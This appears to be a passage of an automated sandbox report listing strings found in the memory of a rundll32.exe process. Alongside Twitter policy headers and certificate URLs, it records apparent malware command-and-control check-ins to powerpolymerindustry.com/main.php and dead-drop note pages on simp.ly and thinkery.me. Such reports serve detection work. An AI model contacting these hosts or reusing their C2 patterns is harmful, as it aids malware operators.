Source: rundll32.exe, 00000002.00000003.338412221.000001DEA855C000.00000004.00000001.sdmpString found in binary or memory: v-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-MzZkMDU4ODctNjgyNC00ZmI4LWFlMTYtZGJlN2Q2MWY1Yjk2'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.508632369.000001DEA8561000.00000004.00000001.sdmpString found in binary or memory: vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-MDYxZWVjZjUtZjY5NC00MWY3LTg3NWMtZjc0ODhkMTBmYWZj'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000002.581389396.000001DEAA2F9000.00000004.00000001.sdmpString found in binary or memory: wimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-YjczNzA0MmItNmY0NC00NzY5LWExYmMtODk4NDc2OTE3ZTE1'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.458880130.000001DEAA2AE000.00000004.00000001.sdmpString found in binary or memory: www.twitter.com0 equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.423757010.000001DEAA276000.00000004.00000001.sdmpString found in binary or memory: y-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdh equals www.twitter.com (Twitter)
Source: unknownDNS traffic detected: queries for: thinkery.me
Source: rundll32.exe, 00000002.00000003.423600045.000001DEA8568000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.
Source: rundll32.exe, 00000002.00000003.405352424.000001DEA857D000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: rundll32.exe, 00000002.00000003.420500372.000001DEA8545000.00000004.00000001.sdmpString found in binary or memory: http://blog.thinkery.me
Source: rundll32.exe, 00000002.00000003.467456140.000001DEA8577000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: rundll32.exe, 00000002.00000003.327500311.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCeJ
Source: rundll32.exe, 00000002.00000003.458880130.000001DEAA2AE000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: rundll32.exe, 00000002.00000003.387437012.000001DEA857E000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
Source: rundll32.exe, 00000002.00000003.450148657.000001DEA8568000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1
Source: rundll32.exe, 00000002.00000003.405352424.000001DEA857D000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: rundll32.exe, 00000002.00000003.450148657.000001DEA8568000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1s&
Source: rundll32.exe, 00000002.00000003.467456140.000001DEA8577000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000002.00000003.403587903.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: http://crl.i
Source: rundll32.exe, 00000002.00000003.405352424.000001DEA857D000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: rundll32.exe, 00000002.00000003.405352424.000001DEA857D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1D2.crl0
Source: rundll32.exe, 00000002.00000003.405352424.000001DEA857D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: rundll32.exe, 00000002.00000003.405285136.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crlL
Source: rundll32.exe, 00000002.00000003.387482062.000001DEA8564000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.c
Source: rundll32.exe, 00000002.00000003.327520104.000001DEA855E000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIn
Source: rundll32.exe, 00000002.00000003.467456140.000001DEA8577000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: rundll32.exe, 00000002.00000003.384669047.000001DEAA276000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: rundll32.exe, 00000002.00000003.458880130.000001DEAA2AE000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: rundll32.exe, 00000002.00000003.467456140.000001DEA8577000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: rundll32.exe, 00000002.00000003.458785935.000001DEA855C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: rundll32.exe, 00000002.00000003.458880130.000001DEAA2AE000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: rundll32.exe, 00000002.00000003.467456140.000001DEA8577000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: rundll32.exe, 00000002.00000003.384669047.000001DEAA276000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: rundll32.exe, 00000002.00000003.458785935.000001DEA855C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0K
Source: rundll32.exe, 00000002.00000003.458880130.000001DEAA2AE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0M
Source: rundll32.exe, 00000002.00000003.405285136.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pH
Source: rundll32.exe, 00000002.00000003.405352424.000001DEA857D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: rundll32.exe, 00000002.00000003.405352424.000001DEA857D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1d20
Source: rundll32.exe, 00000002.00000003.387482062.000001DEA8564000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS
Source: rundll32.exe, 00000002.00000003.405352424.000001DEA857D000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1D2.crt0
Source: rundll32.exe, 00000002.00000002.578424792.000001DEA8480000.00000004.00000020.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?data=rm4&num=ka03eukrWar
Source: rundll32.exe, 00000002.00000002.578424792.000001DEA8480000.00000004.00000020.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?data=rm4&num=ka03eukrWarH.
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?extra=KzltQb&s=MwEdzGNdCEOX6S
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?extra=KzltQb&s=MwEdzGNdCEOX6SW
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.420632198.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?extra=Q6Sj&pflo=UwI2keuco
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?extra=Q6Sj&pflo=UwI2keucoI
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?extra_1=0l&page=2pphYVP24M1
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?extra_1=0l&page=2pphYVP24M1Y
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?format=6tY00&id=0afCSUnwVX
Source: rundll32.exe, 00000002.00000003.396762832.000001DEA8548000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?itemId=Jan&number=DeaH0T4yl
Source: rundll32.exe, 00000002.00000003.547487384.000001DEA8549000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?item_id=k6tb&pf=rMiVME3os1Ur3
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?item_id=k6tb&pf=rMiVME3os1Ur3#
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?item_id=k6tb&pf=rMiVME3os1Ur30Q90
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?item_id=k6tb&pf=rMiVME3os1Ur3C
Source: rundll32.exe, 00000002.00000003.547487384.000001DEA8549000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?item_id=k6tb&pf=rMiVME3os1Ur3_
Source: rundll32.exe, 00000002.00000003.338388994.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?l=shoPtH&extra=CBBZN3mZYAwud
Source: rundll32.exe, 00000002.00000003.358293668.000001DEA855D000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?mode=jN&title=MiyYWkiFMo4jpK
Source: rundll32.exe, 00000002.00000003.358275216.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?mode=jN&title=MiyYWkiFMo4jpK?
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?old_id=BY1RNr&extra_1=ZmUnJ4eFNMA
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?old_id=BY1RNr&extra_1=ZmUnJ4eFNMAm
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?oldid=1uHl&item_id=EL05d4wgjPvAln
Source: rundll32.exe, 00000002.00000003.338412221.000001DEA855C000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?oldid=VLi&view=x104HDdyexE
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?page=hih994P&oldid=MkhNLlu3ug
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?page=hih994P&oldid=MkhNLlu3ugi
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?page=szgS&l=2S6pQoJz
Source: rundll32.exe, 00000002.00000003.405285136.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?pf=8R2GuB&title=NhcEZi4o
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?pf=8R2GuB&title=NhcEZi4o%
Source: rundll32.exe, 00000002.00000003.405285136.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?pf=8R2GuB&title=NhcEZi4o0
Source: rundll32.exe, 00000002.00000003.405285136.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?pf=8R2GuB&title=NhcEZi4oK
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?pflo=NJQIwJ&item_id=GBZWLzSMVSjC5
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?pflo=Rq4vz4x&state=0eizNhvm2
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?pflo=c2&placement=K3NnasaV
Source: rundll32.exe, 00000002.00000002.578601154.000001DEA84FC000.00000004.00000020.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?state=tr&item_id=p5XQMQtr93
Source: rundll32.exe, 00000002.00000002.578601154.000001DEA84FC000.00000004.00000020.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?state=tr&item_id=p5XQMQtr93q
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?status=PV&item_id=Uis4fbiPBc97
Source: rundll32.exe, 00000002.00000003.423445511.000001DEA8548000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?status=PV&item_id=Uis4fbiPBc97A
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?status=vM&view=kr4qkMvthedf
Source: rundll32.exe, 00000002.00000002.578424792.000001DEA8480000.00000004.00000020.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?tag=Q7JXTM&l=zxPDTduok
Source: rundll32.exe, 00000002.00000002.578424792.000001DEA8480000.00000004.00000020.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?tag=Q7JXTM&l=zxPDTduokr.F
Source: rundll32.exe, 00000002.00000002.581114906.000001DEAA2AD000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?term=60&tag=3ZgIAFawRD
Source: rundll32.exe, 00000002.00000002.581114906.000001DEAA2AD000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?term=60&tag=3ZgIAFawRDSRO
Source: rundll32.exe, 00000002.00000002.581114906.000001DEAA2AD000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?term=60&tag=3ZgIAFawRDTS
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.375687263.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?var=Qg2&term=2MbNQAG1ZO2m
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?var=Qg2&term=2MbNQAG1ZO2m6
Source: rundll32.exe, 00000002.00000003.375687263.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?var=Qg2&term=2MbNQAG1ZO2mP
Source: rundll32.exe, 00000002.00000003.367356640.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?var=dzMekg&term=9oah9ucjh
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?var=dzMekg&term=9oah9ucjh2
Source: rundll32.exe, 00000002.00000003.367356640.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?var=dzMekg&term=9oah9ucjhpK
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?var=eNhtIB&data=x5stR1qEOD6BpC
Source: rundll32.exe, 00000002.00000002.581114906.000001DEAA2AD000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?view=Po&pf=A91dkCTCQGqIVN
Source: rundll32.exe, 00000002.00000002.581114906.000001DEAA2AD000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?view=Po&pf=A91dkCTCQGqIVNleM
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?view=pS14S6C&id=b2V1I1GxRlP
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?view=pS14S6C&id=b2V1I1GxRli
Source: rundll32.exe, 00000002.00000003.550071989.000001DEAA2AC000.00000004.00000001.sdmpString found in binary or memory: http://powerpolymerindustry.com/main.php?view=pS14S6C&id=b2V1I1GxRlkLD
Source: rundll32.exe, 00000002.00000003.387437012.000001DEA857E000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0
Source: rundll32.exe, 00000002.00000003.387437012.000001DEA857E000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
Source: rundll32.exe, 00000002.00000003.458785935.000001DEA855C000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.373967961.000001DEA854C000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.394525573.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jt
Source: rundll32.exe, 00000002.00000003.467360767.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jt%
Source: rundll32.exe, 00000002.00000003.346339929.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jt69
Source: rundll32.exe, 00000002.00000003.411852292.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8JtA
Source: rundll32.exe, 00000002.00000003.387444095.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8JtG1ZO2m
Source: rundll32.exe, 00000002.00000003.477264881.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8JtK
Source: rundll32.exe, 00000002.00000003.346339929.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8JtL
Source: rundll32.exe, 00000002.00000003.327500311.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8JtP
Source: rundll32.exe, 00000002.00000003.477287469.000001DEA8568000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8JtX
Source: rundll32.exe, 00000002.00000003.411852292.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8JtZi4o
Source: rundll32.exe, 00000002.00000003.432386294.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jt_
Source: rundll32.exe, 00000002.00000003.449995229.000001DEAA276000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.434090332.000001DEAA276000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.421100775.000001DEAA276000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtams/5a0170161cb602262f000d2c
Source: rundll32.exe, 00000002.00000003.356535725.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtcom/np8j7ovqdl
Source: rundll32.exe, 00000002.00000003.477264881.000001DEA853F000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.338388994.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtem32
Source: rundll32.exe, 00000002.00000003.450148657.000001DEA8568000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtf000d2cL
Source: rundll32.exe, 00000002.00000003.403411650.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtf000d2cy
Source: rundll32.exe, 00000002.00000003.458760849.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtl
Source: rundll32.exe, 00000002.00000003.432386294.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtl?
Source: rundll32.exe, 00000002.00000003.450097224.000001DEA8547000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8JtlL
Source: rundll32.exe, 00000002.00000003.467360767.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.336636841.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtll
Source: rundll32.exe, 00000002.00000003.373967961.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtll0
Source: rundll32.exe, 00000002.00000003.365571089.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8JtllL
Source: rundll32.exe, 00000002.00000003.467360767.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8JtllU
Source: rundll32.exe, 00000002.00000003.420632198.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtllc
Source: rundll32.exe, 00000002.00000003.338388994.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtllr
Source: rundll32.exe, 00000002.00000003.383352250.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtlog.com/vz1g3wmwu2m
Source: rundll32.exe, 00000002.00000003.356550116.000001DEA8563000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtm
Source: rundll32.exe, 00000002.00000003.440742585.000001DEAA276000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtms/5a0170161cb602262f000d2c
Source: rundll32.exe, 00000002.00000003.467360767.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtmwu
Source: rundll32.exe, 00000002.00000003.346339929.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtmwud
Source: rundll32.exe, 00000002.00000003.467360767.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtoft
Source: rundll32.exe, 00000002.00000003.403411650.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtp
Source: rundll32.exe, 00000002.00000003.420632198.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtr
Source: rundll32.exe, 00000002.00000003.508575416.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.432386294.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtstem32
Source: rundll32.exe, 00000002.00000003.373967961.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8JtujhZ
Source: rundll32.exe, 00000002.00000003.336654500.000001DEA8568000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtwu
Source: rundll32.exe, 00000002.00000003.356535725.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtwu?
Source: rundll32.exe, 00000002.00000003.373967961.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8JtwuK
Source: rundll32.exe, 00000002.00000003.394525573.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8JtwuP
Source: rundll32.exe, 00000002.00000003.384676127.000001DEAA27B000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8JtwuU
Source: rundll32.exe, 00000002.00000003.458760849.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jtwud
Source: rundll32.exe, 00000002.00000003.432386294.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.440817199.000001DEA8548000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8Jty
Source: rundll32.exe, 00000002.00000003.336636841.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://simp.ly/publish/pBn8JtyP
Source: rundll32.exe, 00000002.00000003.373950605.000001DEA8537000.00000004.00000001.sdmp, pBn8Jt[1].htm1.2.drString found in binary or memory: http://simplenote.com
Source: rundll32.exe, 00000002.00000003.543376737.000001DEAA273000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywill
Source: rundll32.exe, 00000002.00000003.467360767.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.549645041.000001DEA855D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.373967961.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2c
